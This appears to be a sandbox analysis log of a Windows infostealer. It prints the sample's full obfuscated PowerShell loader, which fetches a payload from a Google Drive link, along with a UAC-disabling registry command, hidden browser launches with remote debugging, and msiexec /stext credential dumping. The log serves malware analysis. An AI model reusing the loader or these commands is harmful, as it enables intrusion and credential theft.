PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 4452 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 4452 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 1736 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Jone Semicurvilinear Plimraadden Storywriter #>;$Udlndinge='Ancien';<#Sndag Snydertampens Formulation Forkamres Unrivet Fuldbyrdet #>; function Immenser($Accoucheurers135){If ($host.DebuggerEnabled) {$granerne++;}$kegful=$Systemgruppers+$Accoucheurers135.'Length' - $granerne; for ( $Tyveaarsdagene=4;$Tyveaarsdagene -lt $kegful;$Tyveaarsdagene+=5){$Tostrenget=$Tyveaarsdagene;$Trehager+=$Accoucheurers135[$Tyveaarsdagene];}$Trehager;}function Aegicrania($Skjulesteds){ . ($Indkomstpligtiges) ($Skjulesteds);}$Spiritualty247=Immenser 'OutpM Raso raszMariiIndel,opslDikoaAlbe/Ma i ';$diaschisma=Immenser 'FortT I llEnedsCons1.nre2 rud ';$Unisexuality=' Cog[eyeoNFy.dEMedvTalve.ReflS ileeSingRDesiV eroiChokcKjesEbo lp,dstOAkkoIS aanglobTIn smBuruaSejpnFaitAZip GStheEsandr Wes]Unde:Anky:RadeSKollEIncacSrgeUBegyrSya iUdluTSandYHaknP W eRWiltOCro TDoctoRetsCAnimOR.stlCliv= Wed$kn bdUnbrIDagvATheos uksCDefiHTuskipraeS S,im GraA eng ';$Spiritualty247+=Immenser ' Le 5Pala. Cul0Sp,c Anop(RetrWEriniDue nBu ud AfdoRehaw KatsPers LkkeN ColTElek Demu1 Dor0Fors.Ribb0Havm;.eac OrnaWSlidiAbbrnKloi6 rea4Skye;Thre Progx Hyd6 Imp4Retn;Bigg asr un vVolk:Shel1V,so3nonb1Rnke.Stet0Fo,e)Diab CoulGOmfae OkocSkulkankeoCro./Kapi2Konk0Fem 1Udra0B gh0 C e1 T.l0Immu1B li VoicFWandiAgrersplae,urufTopeoA.tox Ci,/ oh1Plat3 Lik1 T l.Ty,a0Nor ';$Micropaleontologist=Immenser 'AlfoUIndlsNatuESoluRO ga-EfteASfaeGCos EO eaN,shaTmisp ';$pharyngology=Immenser 'Te ehLegatS amtTeaspWhissArch:Lakr/klar/Ad.ldLeverU.foiDri,vVg keSpid. turgFreao looDebigPhthl DipeKany.DraccHosto igmFjor/SaleuGe.fcHovn? 
ConeWassx ,etpWarroDe,drPrett eo=Heatdmne,ooff wD ganDentltrieo EclaAnchdPlat&BaluiIchtdPors=akad1 M ntBr lI renvDia rHarpdOxyhXRecuTSe oV C pB.ids8OppoiOnyc-SkabCBenokKerna Sacy MadZBioskLag OBog,RRep,LWhig4Uds BParaXFingdBe kF RepVPseueLol hCan 6 FilEKubiOSpar ';$Afstikkerens=Immenser 'Bygg>Pold ';$Indkomstpligtiges=Immenser 'H,loiJonbEBogsx kat ';$Rollings='Forbryderes';$Fornjelsesrejse='\Avlshingstes2.Xyl';Aegicrania (Immenser 'Asga$ CipgFngsl.pvuOMy tb llAOutml Ska:IvitNFu.dareveGValagFaciiLgesN unoGAn slsikkyC ns=Derm$R.prECoveN Apiv.ord:wittA pedpa uaPtar.d psAVaerTKe,eAS un+Sce.$LacefLipoO esiR Mi n,ataJchapEafl.L Br smineeSlikS KlirAdreeAnatjTablsT,roe A.e ');Aegicrania (Immenser ',amf$Co,kG SubL Foro herBOpiuANrmeLRege: litFBedeON nar DemURingD VogRFruge SfafL,nde nkRAfbreDatiNSudacAne.eTraasOdge2K,ns3Fl r5Fab = nor$ CenPUovehHexaATe,rRSurnyRo tn BetgRe no ralReliobackG,ubly In,. Neds,terpPlatL LusIHottTHigh(Rach$ M raVirkfPin s St TComeIDikokKan KMythEslanrSgereImmoN ortsedei)Intr ');Aegicrania (Immenser $Unisexuality);$pharyngology=$Forudreferences235[0];$Aphanozygous=(Immenser ' Adi$UnevGR.velFortO ,hib BorADeliL Edw: GenCLeksyCa dcSminLSan o NedN VasITresCAile=MadsNPseuETuguwG,ne-e vro.errB klujLacteTop CPol,T Bio SkrasTerrYRoqusforetMoo eSultMSeru.ThyrNAirmESpyfTMe t. 
PseW PopESmmeBSemiCMntrlAcheIfo tE Ma n jerTEksk ');Aegicrania ($Aphanozygous);Aegicrania (Immenser 'Axio$ForeCEncyy Ov.cOpl.luncaosedunIndtiBea.cWean.PodoH .bleBla a Sprd LeveSu er Kl sHete[Ethn$ Dy MCidaiFo kcflder SkvoEa epGe eaGi,al ame SysoKrftn BehtSkrpoYve,lHandoHypegSortiCalisTravtHof ]Sus =Ulde$stemSBejepU stiDallrAngiiPro tInteuFor aColll ettMandy Me.2busl4Thic7Noti ');$Nondeflationary=Immenser ' Epo$VariCPtilySparc l dlLeddoMoton UdliDramcCull.FarlD T ao En,w AcenN sol veroM noaDag,d BesFEmboiSultlBereeOrd,(Kjes$Und.p SprhSulta bjer eiychoknWe ngU.foost rl DewoUdsugWooly.ove,Dyre$ CymRCly.eWessg G naH lltexemtDiskaPaddeHousrEn.esUnde)Dagb ';$Regattaers=$naggingly;Aegicrania (Immenser 'Tra $Xen GGrafl UlvOT anb penaAi wLSino:HattM alaAA,toZErotURhinRThlaK .weAakts= O e(smaktha vEUnd sRearT.ure-FlotpSeriALu.stTankhC vi Toki$UglerbarbEGascg quia Ca,tFrolTSynsaSkafe BalRTranSSpri)Kv l ');while (!$mazurka) {Aegicrania (Immenser ' po$non gPhotlAltao CatbNonsaJil,lTung: BitBTubauLntirJanilVeroeTi stHigh=Outw$ Dimt .unrMariufasteYd.r ') ;Aegicrania $Nondeflationary;Aegicrania (Immenser 'TjrnSParatPan aAestrT.nstTele-B,nkSPy.eL Bl eBry EPiloPCon Fu v4Gip ');Aegicrania (Immenser 'P,an$Os egUrk.l ecaOT adBAr haVirkLJagt:Gi bmpaanABarnzMariuTermRAlonkAgamA Car=C os(EjerTYamseD lmsunnoTSub.-u.baPBrd AStu,TBogoHidrt tyk$LgterOutne NonG MegADisstRaditIndkA HaaE .apRNoncs Cam)Blok ') ;Aegicrania (Immenser 'U vu$ EksgCrepLJussOBetaB t eaBehaLHy l: losSRotukafplrFor u enceBudctYverSFrar=Poss$ ChuGAlarLBanaOUtilBDataAPa.tLCajs:Bi laCompN SigtOverIJ coPBlokY MatostyrNL veITraiNLich+hums+Tier%Pyro$MatsFVagaOU.dnRSin u HalDMalarDo sEHiblFOvere.isfRCha,eSta NKosoC Kr.eTrirs .ve2Prop3 Fll5Runr. 
Cucc SwaoMerruDoglNNaziTKorr ') ;$pharyngology=$Forudreferences235[$skruets];}$Fortidige=289428;$Tacamahac=30629;Aegicrania (Immenser 'Rusl$Tee,GInd LOmstOPhosbMeleA pdL.ele:Antit pipRPro YSifaKomskKPh nE TartGuldECoy k A rNNit,i PrekBenzSSkil Burl=Su e Ru,GOverEButtT Phy-MyolC T koStavnBr,mtSupeEAsepnbrndTLelw Pneo$InsiRFasee Argg,nkoa Ov,T.isatBagtaNonceraasRHedgsNeg, ');Aegicrania (Immenser ' N,n$ EftgNonll banoKultb ,fsa achlPena:St aIFrees Rego .edcParar Ke ySan mV rieOver Russ= mo Roth[TaclS,ndbyAigls ydrt.alue DenmMy,o.ret CC gaoUnc,nVomivBhlae,bbrrstr tK,al] Aet:Kred:ForsFTilfr Subo icmW ldB Unda,ulpsBru.eSk.r6,rys4SensSSimrtWarsrMenniFedtnT pngLa.i(Gods$Syn.TM,strHumayMicokLi,nkRegne.owat Rege petkDrifnMythi,inakOutcs Co.)Imit ');Aegicrania (Immenser ' fem$Opdrg ,anl OakoRielbMotoAUd.olServ: b pRanb E RodCSediIS rirBrinKAfsku hytlBumkEBusaRRestiA tiNMargg DucESlb,rSquaNEboneLuttsr ce K n= Dr Hor[UnarS kanYDel s lertCor E DevmS,if.Torgt NoneKarixSa ktU,de. SoreMis,nClocc ekoPiped OboIDro nKittGCur ],kva:Subs: OpsATrflSDerecMateiTridIFo s.DigegFrdsE E hTg ngS M ntDeltraccoimuhaN.ectgUdkl( Gen$SymbISyres ilkOVel,CCyt RLy tYMo rMVolaeE cl)N ur ');Aegicrania (Immenser 'Hj,e$AverGS inl Ha.OForfBProda DisLOvid: UpsjU,ocu MasMFlorb OrnUAt acsaboK ela=Bere$Od.rRDukkE pheCeksaiSamlrHadbkSkufuNedrl .aueSilkRNonmiM hanPrecgUnwwe KulrVrdiNStukE ReaSS.pe.StamsBa nuuncabRelesSmittEndorSt kiBenzNMesoGSt r(Dis $TystfAdr oAncyR CerTTy,nIVeleDUnboiSaragMedaeBene,Hie $ NavTCe ea R pc hibAB,limMedlaRigshTo aABrudCK.lb) el ');Aegicrania $Jumbuck;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Jone Semicurvilinear Plimraadden Storywriter #>;$Udlndinge='Ancien';<#Sndag Snydertampens Formulation Forkamres Unrivet Fuldbyrdet #>; function Immenser($Accoucheurers135){If ($host.DebuggerEnabled) {$granerne++;}$kegful=$Systemgruppers+$Accoucheurers135.'Length' - $granerne; for ( $Tyveaarsdagene=4;$Tyveaarsdagene -lt $kegful;$Tyveaarsdagene+=5){$Tostrenget=$Tyveaarsdagene;$Trehager+=$Accoucheurers135[$Tyveaarsdagene];}$Trehager;}function Aegicrania($Skjulesteds){ . ($Indkomstpligtiges) ($Skjulesteds);}$Spiritualty247=Immenser 'OutpM Raso raszMariiIndel,opslDikoaAlbe/Ma i ';$diaschisma=Immenser 'FortT I llEnedsCons1.nre2 rud ';$Unisexuality=' Cog[eyeoNFy.dEMedvTalve.ReflS ileeSingRDesiV eroiChokcKjesEbo lp,dstOAkkoIS aanglobTIn smBuruaSejpnFaitAZip GStheEsandr Wes]Unde:Anky:RadeSKollEIncacSrgeUBegyrSya iUdluTSandYHaknP W eRWiltOCro TDoctoRetsCAnimOR.stlCliv= Wed$kn bdUnbrIDagvATheos uksCDefiHTuskipraeS S,im GraA eng ';$Spiritualty247+=Immenser ' Le 5Pala. Cul0Sp,c Anop(RetrWEriniDue nBu ud AfdoRehaw KatsPers LkkeN ColTElek Demu1 Dor0Fors.Ribb0Havm;.eac OrnaWSlidiAbbrnKloi6 rea4Skye;Thre Progx Hyd6 Imp4Retn;Bigg asr un vVolk:Shel1V,so3nonb1Rnke.Stet0Fo,e)Diab CoulGOmfae OkocSkulkankeoCro./Kapi2Konk0Fem 1Udra0B gh0 C e1 T.l0Immu1B li VoicFWandiAgrersplae,urufTopeoA.tox Ci,/ oh1Plat3 Lik1 T l.Ty,a0Nor ';$Micropaleontologist=Immenser 'AlfoUIndlsNatuESoluRO ga-EfteASfaeGCos EO eaN,shaTmisp ';$pharyngology=Immenser 'Te ehLegatS amtTeaspWhissArch:Lakr/klar/Ad.ldLeverU.foiDri,vVg keSpid. turgFreao looDebigPhthl DipeKany.DraccHosto igmFjor/SaleuGe.fcHovn? 
ConeWassx ,etpWarroDe,drPrett eo=Heatdmne,ooff wD ganDentltrieo EclaAnchdPlat&BaluiIchtdPors=akad1 M ntBr lI renvDia rHarpdOxyhXRecuTSe oV C pB.ids8OppoiOnyc-SkabCBenokKerna Sacy MadZBioskLag OBog,RRep,LWhig4Uds BParaXFingdBe kF RepVPseueLol hCan 6 FilEKubiOSpar ';$Afstikkerens=Immenser 'Bygg>Pold ';$Indkomstpligtiges=Immenser 'H,loiJonbEBogsx kat ';$Rollings='Forbryderes';$Fornjelsesrejse='\Avlshingstes2.Xyl';Aegicrania (Immenser 'Asga$ CipgFngsl.pvuOMy tb llAOutml Ska:IvitNFu.dareveGValagFaciiLgesN unoGAn slsikkyC ns=Derm$R.prECoveN Apiv.ord:wittA pedpa uaPtar.d psAVaerTKe,eAS un+Sce.$LacefLipoO esiR Mi n,ataJchapEafl.L Br smineeSlikS KlirAdreeAnatjTablsT,roe A.e ');Aegicrania (Immenser ',amf$Co,kG SubL Foro herBOpiuANrmeLRege: litFBedeON nar DemURingD VogRFruge SfafL,nde nkRAfbreDatiNSudacAne.eTraasOdge2K,ns3Fl r5Fab = nor$ CenPUovehHexaATe,rRSurnyRo tn BetgRe no ralReliobackG,ubly In,. Neds,terpPlatL LusIHottTHigh(Rach$ M raVirkfPin s St TComeIDikokKan KMythEslanrSgereImmoN ortsedei)Intr ');Aegicrania (Immenser $Unisexuality);$pharyngology=$Forudreferences235[0];$Aphanozygous=(Immenser ' Adi$UnevGR.velFortO ,hib BorADeliL Edw: GenCLeksyCa dcSminLSan o NedN VasITresCAile=MadsNPseuETuguwG,ne-e vro.errB klujLacteTop CPol,T Bio SkrasTerrYRoqusforetMoo eSultMSeru.ThyrNAirmESpyfTMe t. 
PseW PopESmmeBSemiCMntrlAcheIfo tE Ma n jerTEksk ');Aegicrania ($Aphanozygous);Aegicrania (Immenser 'Axio$ForeCEncyy Ov.cOpl.luncaosedunIndtiBea.cWean.PodoH .bleBla a Sprd LeveSu er Kl sHete[Ethn$ Dy MCidaiFo kcflder SkvoEa epGe eaGi,al ame SysoKrftn BehtSkrpoYve,lHandoHypegSortiCalisTravtHof ]Sus =Ulde$stemSBejepU stiDallrAngiiPro tInteuFor aColll ettMandy Me.2busl4Thic7Noti ');$Nondeflationary=Immenser ' Epo$VariCPtilySparc l dlLeddoMoton UdliDramcCull.FarlD T ao En,w AcenN sol veroM noaDag,d BesFEmboiSultlBereeOrd,(Kjes$Und.p SprhSulta bjer eiychoknWe ngU.foost rl DewoUdsugWooly.ove,Dyre$ CymRCly.eWessg G naH lltexemtDiskaPaddeHousrEn.esUnde)Dagb ';$Regattaers=$naggingly;Aegicrania (Immenser 'Tra $Xen GGrafl UlvOT anb penaAi wLSino:HattM alaAA,toZErotURhinRThlaK .weAakts= O e(smaktha vEUnd sRearT.ure-FlotpSeriALu.stTankhC vi Toki$UglerbarbEGascg quia Ca,tFrolTSynsaSkafe BalRTranSSpri)Kv l ');while (!$mazurka) {Aegicrania (Immenser ' po$non gPhotlAltao CatbNonsaJil,lTung: BitBTubauLntirJanilVeroeTi stHigh=Outw$ Dimt .unrMariufasteYd.r ') ;Aegicrania $Nondeflationary;Aegicrania (Immenser 'TjrnSParatPan aAestrT.nstTele-B,nkSPy.eL Bl eBry EPiloPCon Fu v4Gip ');Aegicrania (Immenser 'P,an$Os egUrk.l ecaOT adBAr haVirkLJagt:Gi bmpaanABarnzMariuTermRAlonkAgamA Car=C os(EjerTYamseD lmsunnoTSub.-u.baPBrd AStu,TBogoHidrt tyk$LgterOutne NonG MegADisstRaditIndkA HaaE .apRNoncs Cam)Blok ') ;Aegicrania (Immenser 'U vu$ EksgCrepLJussOBetaB t eaBehaLHy l: losSRotukafplrFor u enceBudctYverSFrar=Poss$ ChuGAlarLBanaOUtilBDataAPa.tLCajs:Bi laCompN SigtOverIJ coPBlokY MatostyrNL veITraiNLich+hums+Tier%Pyro$MatsFVagaOU.dnRSin u HalDMalarDo sEHiblFOvere.isfRCha,eSta NKosoC Kr.eTrirs .ve2Prop3 Fll5Runr. 
Cucc SwaoMerruDoglNNaziTKorr ') ;$pharyngology=$Forudreferences235[$skruets];}$Fortidige=289428;$Tacamahac=30629;Aegicrania (Immenser 'Rusl$Tee,GInd LOmstOPhosbMeleA pdL.ele:Antit pipRPro YSifaKomskKPh nE TartGuldECoy k A rNNit,i PrekBenzSSkil Burl=Su e Ru,GOverEButtT Phy-MyolC T koStavnBr,mtSupeEAsepnbrndTLelw Pneo$InsiRFasee Argg,nkoa Ov,T.isatBagtaNonceraasRHedgsNeg, ');Aegicrania (Immenser ' N,n$ EftgNonll banoKultb ,fsa achlPena:St aIFrees Rego .edcParar Ke ySan mV rieOver Russ= mo Roth[TaclS,ndbyAigls ydrt.alue DenmMy,o.ret CC gaoUnc,nVomivBhlae,bbrrstr tK,al] Aet:Kred:ForsFTilfr Subo icmW ldB Unda,ulpsBru.eSk.r6,rys4SensSSimrtWarsrMenniFedtnT pngLa.i(Gods$Syn.TM,strHumayMicokLi,nkRegne.owat Rege petkDrifnMythi,inakOutcs Co.)Imit ');Aegicrania (Immenser ' fem$Opdrg ,anl OakoRielbMotoAUd.olServ: b pRanb E RodCSediIS rirBrinKAfsku hytlBumkEBusaRRestiA tiNMargg DucESlb,rSquaNEboneLuttsr ce K n= Dr Hor[UnarS kanYDel s lertCor E DevmS,if.Torgt NoneKarixSa ktU,de. SoreMis,nClocc ekoPiped OboIDro nKittGCur ],kva:Subs: OpsATrflSDerecMateiTridIFo s.DigegFrdsE E hTg ngS M ntDeltraccoimuhaN.ectgUdkl( Gen$SymbISyres ilkOVel,CCyt RLy tYMo rMVolaeE cl)N ur ');Aegicrania (Immenser 'Hj,e$AverGS inl Ha.OForfBProda DisLOvid: UpsjU,ocu MasMFlorb OrnUAt acsaboK ela=Bere$Od.rRDukkE pheCeksaiSamlrHadbkSkufuNedrl .aueSilkRNonmiM hanPrecgUnwwe KulrVrdiNStukE ReaSS.pe.StamsBa nuuncabRelesSmittEndorSt kiBenzNMesoGSt r(Dis $TystfAdr oAncyR CerTTy,nIVeleDUnboiSaragMedaeBene,Hie $ NavTCe ea R pc hibAB,limMedlaRigshTo aABrudCK.lb) el ');Aegicrania $Jumbuck;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc2ebccc40,0x7ffc2ebccc4c,0x7ffc2ebccc58

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ipqrymijdbvsnektqezwbayftjyckmdnyw"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjvjzes"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vdbcawdeer"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4576,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4320 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,16659318223560537130,16815110254272013571,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc2ea846f8,0x7ffc2ea84708,0x7ffc2ea84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

